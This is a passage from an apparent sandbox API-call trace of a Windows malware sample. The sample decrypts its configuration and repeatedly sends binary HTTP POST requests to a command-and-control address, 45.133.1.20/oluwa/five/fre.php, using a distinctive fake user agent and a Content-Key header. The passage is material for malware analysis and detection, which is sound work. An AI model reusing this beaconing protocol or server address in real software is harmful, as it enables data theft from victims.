*/*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0188.514] GetProcessHeap () returned 0x6a0000 [0188.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0188.514] GetProcessHeap () returned 0x6a0000 [0188.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0188.515] GetProcessHeap () returned 0x6a0000 [0188.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0188.515] GetProcessHeap () returned 0x6a0000 [0188.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0188.518] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0188.519] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0188.519] GetProcessHeap () returned 0x6a0000 [0188.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0188.519] GetProcessHeap () returned 0x6a0000 [0188.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0188.519] send (s=0x468, buf=0x6b5c98*, len=242, flags=0) returned 242 [0188.520] send (s=0x468, buf=0x6bb998*, len=159, flags=0) returned 159 [0188.520] GetProcessHeap () returned 0x6a0000 [0188.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0188.520] recv (in: s=0x468, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0188.597] GetProcessHeap () returned 0x6a0000 [0188.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0188.599] GetProcessHeap () returned 0x6a0000 [0188.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0188.599] GetProcessHeap () returned 0x6a0000 [0188.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0188.600] GetProcessHeap () returned 0x6a0000 [0188.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0188.600] closesocket (s=0x468) returned 0 [0188.601] GetProcessHeap () returned 0x6a0000 [0188.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0188.601] GetProcessHeap () returned 0x6a0000 [0188.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0188.601] GetProcessHeap () returned 0x6a0000 [0188.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0188.601] GetProcessHeap () returned 0x6a0000 [0188.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0188.602] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xabc) returned 0x468 [0188.606] Sleep (dwMilliseconds=0xea60) [0188.607] GetProcessHeap () returned 0x6a0000 [0188.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0188.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.609] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.618] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0188.626] GetProcessHeap () returned 0x6a0000 [0188.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0188.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.640] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0188.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.641] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.642] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.642] GetProcessHeap () returned 0x6a0000 [0188.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0188.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.644] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0188.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.646] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0188.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.650] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0188.650] GetProcessHeap () returned 0x6a0000 [0188.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0188.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.656] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0188.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.660] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0188.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.661] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0188.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.662] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0188.662] GetProcessHeap () returned 0x6a0000 [0188.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0188.662] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0188.663] GetProcessHeap () returned 0x6a0000 [0188.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0188.663] GetProcessHeap () returned 0x6a0000 [0188.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0188.663] GetProcessHeap () returned 0x6a0000 [0188.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0188.664] GetProcessHeap () returned 0x6a0000 [0188.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0188.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.665] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.718] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0188.730] GetProcessHeap () returned 0x6a0000 [0188.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0188.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.731] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0188.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.732] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.736] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.736] GetProcessHeap () returned 0x6a0000 [0188.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0188.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.737] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0188.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.758] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0188.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.759] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0188.759] GetProcessHeap () returned 0x6a0000 [0188.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0188.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.761] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0188.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.762] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0188.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.764] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0188.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.765] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0188.765] GetProcessHeap () returned 0x6a0000 [0188.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0188.765] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0188.765] GetProcessHeap () returned 0x6a0000 [0188.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0188.765] socket (af=2, type=1, protocol=6) returned 0x46c [0188.766] connect (s=0x46c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0188.793] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0188.793] GetProcessHeap () returned 0x6a0000 [0188.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0188.793] GetProcessHeap () returned 0x6a0000 [0188.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0188.795] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0188.796] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0188.796] GetProcessHeap () returned 0x6a0000 [0188.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0188.796] GetProcessHeap () returned 0x6a0000 [0188.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0188.796] GetProcessHeap () returned 0x6a0000 [0188.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0188.797] GetProcessHeap () returned 0x6a0000 [0188.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0188.797] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0188.798] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0188.798] GetProcessHeap () returned 0x6a0000 [0188.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0188.798] GetProcessHeap () returned 0x6a0000 [0188.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0188.799] send (s=0x46c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0188.800] send (s=0x46c, buf=0x6bb998*, len=159, flags=0) returned 159 [0188.800] GetProcessHeap () returned 0x6a0000 [0188.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0188.800] recv (in: s=0x46c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0188.875] GetProcessHeap () returned 0x6a0000 [0188.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0188.876] GetProcessHeap () returned 0x6a0000 [0188.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0188.876] GetProcessHeap () returned 0x6a0000 [0188.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0188.877] GetProcessHeap () returned 0x6a0000 [0188.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0188.878] closesocket (s=0x46c) returned 0 [0188.879] GetProcessHeap () returned 0x6a0000 [0188.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0188.879] GetProcessHeap () returned 0x6a0000 [0188.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0188.880] GetProcessHeap () returned 0x6a0000 [0188.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0188.880] GetProcessHeap () returned 0x6a0000 [0188.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0188.881] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11d8) returned 0x46c [0188.883] Sleep (dwMilliseconds=0xea60) [0188.884] GetProcessHeap () returned 0x6a0000 [0188.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0188.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.886] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.895] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0188.907] GetProcessHeap () returned 0x6a0000 [0188.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bffc8 [0188.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.908] CryptImportKey (in: hProv=0x6bec18, pbData=0x6bffc8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0188.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.910] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.911] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.911] GetProcessHeap () returned 0x6a0000 [0188.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bffc8 | out: hHeap=0x6a0000) returned 1 [0188.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.913] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0188.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.914] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0188.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.918] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0188.918] GetProcessHeap () returned 0x6a0000 [0188.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0188.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.923] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0188.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.925] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0188.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.969] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0188.970] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.970] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0188.970] GetProcessHeap () returned 0x6a0000 [0188.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0188.971] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0188.971] GetProcessHeap () returned 0x6a0000 [0188.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0188.972] GetProcessHeap () returned 0x6a0000 [0188.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0188.972] GetProcessHeap () returned 0x6a0000 [0188.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0188.972] GetProcessHeap () returned 0x6a0000 [0188.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0188.973] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.974] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.983] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0188.994] GetProcessHeap () returned 0x6a0000 [0188.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0188.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.995] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0188.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.996] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.998] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.998] GetProcessHeap () returned 0x6a0000 [0188.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0188.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.999] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0189.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.001] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0189.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.005] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0189.005] GetProcessHeap () returned 0x6a0000 [0189.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0189.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.006] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0189.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.008] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0189.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.009] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0189.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.010] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0189.010] GetProcessHeap () returned 0x6a0000 [0189.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0189.011] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0189.011] GetProcessHeap () returned 0x6a0000 [0189.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0189.011] socket (af=2, type=1, protocol=6) returned 0x470 [0189.011] connect (s=0x470, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0189.054] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0189.054] GetProcessHeap () returned 0x6a0000 [0189.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0189.054] GetProcessHeap () returned 0x6a0000 [0189.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0189.055] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0189.056] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0189.056] GetProcessHeap () returned 0x6a0000 [0189.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0189.056] GetProcessHeap () returned 0x6a0000 [0189.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0189.057] GetProcessHeap () returned 0x6a0000 [0189.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0189.057] GetProcessHeap () returned 0x6a0000 [0189.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0189.060] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0189.061] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: 